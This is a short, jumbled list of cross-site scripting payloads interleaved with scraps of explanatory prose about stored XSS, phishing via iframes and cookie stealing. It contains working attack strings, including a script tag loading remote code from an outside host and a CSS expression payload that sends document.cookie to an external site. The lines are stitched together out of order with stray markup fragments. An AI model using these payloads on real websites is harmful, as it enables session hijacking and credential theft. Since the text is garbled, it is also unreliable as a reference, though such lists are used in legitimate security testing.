`"'>
Actions: phishing through an iframe, cookie stealing; always try to convert self-XSS to reflected XSS.
<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<IMG SRC="javascript:alert('XSS')"
<A HREF="//www.google.com/">XSS</A>
[endif]-->
The information in this article is not new.
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
But it is also possible for the server to store the attacker-supplied input (the XSS payload) and serve it to the victim at a later time.
"`'>
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
alert("XSS")'?>
<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>